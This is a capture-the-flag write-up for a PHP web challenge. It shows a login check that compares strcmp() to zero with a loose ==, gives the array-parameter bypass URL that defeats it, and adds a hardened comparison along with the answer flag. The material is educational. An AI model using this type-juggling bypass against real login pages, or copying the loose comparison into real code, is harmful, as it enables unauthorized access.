
L33t H4xx0r

Challenge

If you could bypass the login you could get the flag. Link

Solution

We get to a webpage with a password field and the message "Seems like your not a haxxor". We are also given the source:

<?php
    $FLAGWEB6 = (file_get_contents("flag.txt"));
    $PASSWORD =  (file_get_contents("flag.txt")); //haha

    if(isset($_GET['password'])){
        if(strcmp($PASSWORD, $_GET['password']) == 0){
            $success = true;
        }
        else{
            $success = false;
        }
    }
    else {
        $success = false;
    }
?>

We see that the password is checked with the strcmp function and that its result is compared to 0 with the loose == operator. We can bypass this by supplying password as an array instead of a string, which makes the strcmp(...) == 0 check succeed regardless of the real password.

http://yrmyzscnvh.abctf.xyz/web6/?password[]=bla
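
Why the array gets through and how to close it, as an added example that is not the challenge's code or part of the original writeup: on PHP before 8, strcmp() given an array returns NULL, and NULL == 0 is true under loose comparison. The function names and the $secret value are constructed for illustration.

```php
<?php
// Added example: the challenge's comparison beside a hardened one.

/** Same logic as the challenge source: loose == on strcmp()'s result. */
function check_vulnerable(string $secret, $input): bool
{
    try {
        // PHP < 8: a non-string argument makes strcmp() emit a warning
        // (suppressed here with @) and return NULL; NULL == 0 is true.
        return @strcmp($secret, $input) == 0;
    } catch (TypeError $e) {
        // PHP >= 8: strcmp() throws instead of returning NULL.
        return false;
    }
}

/** Hardened: reject anything that is not a string, then compare in constant time. */
function check_hardened(string $secret, $input): bool
{
    if (!is_string($input)) {
        return false;
    }
    return hash_equals($secret, $input);
}

$secret = 'constructed-placeholder-secret'; // constructed value, not the real flag

// Constructed inputs, shaped like what PHP puts in $_GET['password'].
$cases = [
    'correct string' => $secret,
    'wrong string'   => 'bla',
    'array'          => ['bla'], // ?password[]=bla arrives as an array
];

foreach ($cases as $label => $input) {
    printf(
        "%-15s vulnerable=%s hardened=%s\n",
        $label,
        var_export(check_vulnerable($secret, $input), true),
        var_export(check_hardened($secret, $input), true)
    );
}
```

On PHP 7 the array row shows the vulnerable check returning true; on PHP 8 both return false because strcmp() raises a TypeError, but the explicit is_string() test keeps the behaviour independent of the interpreter version.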

Flag

abctf{always_know_whats_going_on}